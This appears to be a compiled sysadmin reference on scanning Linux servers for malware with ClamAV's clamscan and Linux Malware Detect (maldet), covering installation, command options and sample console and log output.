  • To check all files on the computer, displaying the name of each file:
    clamscan -r /
  • To check all files on the computer, but only display infected files and ring a bell when found:
    clamscan -r --bell -i /
  • To check files in all users' home directories:
    clamscan -r /home
  • To check files in the USER home directory and move infected files to another folder:
    clamscan -r --move=/home/USER/VIRUS /home/USER
  • To check files in the USER home directory and remove infected files (WARNING: Files are gone.):
    clamscan -r --remove /home/USER
  • To see more options:
    clamscan --help 
     
    Source: http://askubuntu.com/questions/250290/how-do-i-scan-for-viruses-with-clamav 
     
     

Maldet Installation

Malware Detect is very easy to install on CentOS, regardless of the control panel you use (cPanel/WHM, DirectAdmin, etc). Maldet, also known as Linux Malware Detect, is a malware scanner for Linux.
There is nothing complicated in the installation process, but root access to your server is required.

Installation via SSH

cd /usr/local/src/
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzf maldetect-current.tar.gz
cd maldetect-*
sh ./install.sh (or sudo sh ./install.sh)
maldet --update-ver
maldet --update


To scan a folder, for example /home you should type maldet -a /home.

That's it!

Maldet Essential Commands

Syntax:

# maldet [options] /path/to/scan
 
Important switches of maldet:

1, -b, --background
Execute operations in the background, ideal for large scans
Example:
[root@crybit ~]# maldet -b -r /home/crybit/
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9922): {scan} launching scan of /home/crybit/ changes in last 7d to background, see /usr/local/maldetect/event_log for progress
 
 
2, -u, --update
Update malware detection signatures from rfxn.com

3, -d, --update-ver
Update the installed version from rfxn.com
Example:
[root@crybit ~]# maldet -d
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(9997): {update} checking for available updates...
maldet(9997): {update} hashing install files and checking against server...
maldet(9997): {update} version check shows latest but hash check failed, forcing update...
maldet(9997): {update} completed update v1.4.2 => v1.4.2, running signature updates...
maldet(10289): {sigup} performing signature update check...
maldet(10289): {sigup} local signature set is version 201402051649
maldet(10289): {sigup} latest signature set already installed
maldet(9997): {update} update and config import completed.
 
4, -m, --monitor USERS|PATHS|FILE
Run maldet with inotify kernel level file create/modify monitoring
If USERS is specified, monitor user homedirs for UIDs > 500
If FILE is specified, paths will be extracted from file, line spaced
If PATHS are specified, must be a comma spaced list, NO WILDCARDS!
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

Example:
[root@crybit ~]# maldet -m /home/crybit/
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(10347): {mon} set inotify max_user_instances to 128
/usr/local/sbin/maldet: line 1162: /proc/sys/fs/inotify/max_user_instances: Permission denied
maldet(10347): {mon} set inotify max_user_watches to 0
/usr/local/sbin/maldet: line 1164: /proc/sys/fs/inotify/max_user_watches: Permission denied
maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
maldet(10347): {mon} inotify startup successful (pid: 10422)
maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
 
5, -k, --kill
Terminate inotify monitoring service
Example:
[root@crybit ~]# maldet -k
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2
maldet(10471): {mon} sent kill to monitor service
 
6, -r, --scan-recent PATH DAYS
Scan files created/modified in the last X days (default: 7d, wildcard: ?)
e.g: maldet -r /home/?/public_html 2

7, -a, --scan-all PATH
Scan all files in path (default: /home, wildcard: ?)
e.g: maldet -a /home/?/public_html

8, -c, --checkout FILE
Upload suspected malware to rfxn.com for review & hashing into signatures

9, -l, --log
View maldet log file events.
Example:
[root@crybit ~]# maldet -l
Linux Malware Detect v1.4.2
(C) 2002-2013, R-fx Networks <proj@r-fx.org>
(C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

Feb 06 02:38:28 jishnu maldet(10347): {mon} set inotify max_user_watches to 0
Feb 06 02:38:28 jishnu maldet(10347): {mon} added /home/crybit/ to inotify monitoring array
Feb 06 02:38:28 jishnu maldet(10347): {mon} starting inotify process on 1 paths, this might take awhile...
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify startup successful (pid: 10422)
Feb 06 02:38:30 jishnu maldet(10347): {mon} inotify monitoring log: /usr/local/maldetect/inotify/inotify_log
Feb 06 02:39:43 jishnu maldet(10471): {mon} sent kill to monitor service
Feb 06 02:40:00 jishnu maldet(10347): {mon} monitoring terminated by user, inotify killed.
Feb 06 02:41:00 jishnu maldet(10550): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:00 jishnu maldet(10550): {scan} building file list for /home/crybit/ of new/modified files from last 1 days, this might take awhile...
Feb 06 02:41:00 jishnu maldet(10550): {scan} scan returned zero results, please increase days range or provide a new path.
Feb 06 02:41:11 jishnu maldet(10615): {scan} signatures loaded: 11552 (9668 MD5 / 1884 HEX)
Feb 06 02:41:11 jishnu maldet(10615): {scan} building file list for /home/crybit/ of new/modified files from last 2 days, this might take awhile...
Feb 06 02:41:11 jishnu maldet(10615): {scan} scan returned zero results, please increase days range or provide a new path.
10, -e, --report SCANID email
View scan report of most recent scan or of a specific SCANID and optionally e-mail the report to a supplied e-mail address.
e.g: maldet --report
e.g: maldet --report list
e.g: maldet --report 050910-1534.21135
e.g: maldet --report SCANID user@domain.com
11, -s, --restore FILE|SCANID
Restore file from quarantine queue to original path or restore all items from a specific SCANID
e.g: maldet --restore /usr/local/maldetect/quarantine/config.php.23754
e.g: maldet --restore 050910-1534.21135
12, -q, --quarantine SCANID
Quarantine all malware from report SCANID
e.g: maldet --quarantine 050910-1534.21135
13, -n, --clean SCANID
Try to clean & restore malware hits from report SCANID
e.g: maldet --clean 050910-1534.21135
14, -U, --user USER
Set execution under specified user, ideal for restoring from user quarantine or to view user reports.
e.g: maldet --user nobody --report
e.g: maldet --user nobody --restore 050910-1534.21135

15, -p, --purge
Clear logs, quarantine queue, session and temporary data.
That’s it!!


Source : http://crybit.com/maldet-options/

Maldet Scan Command

Maldet Single Account Scan Command :

maldet --scan-all /home/domainname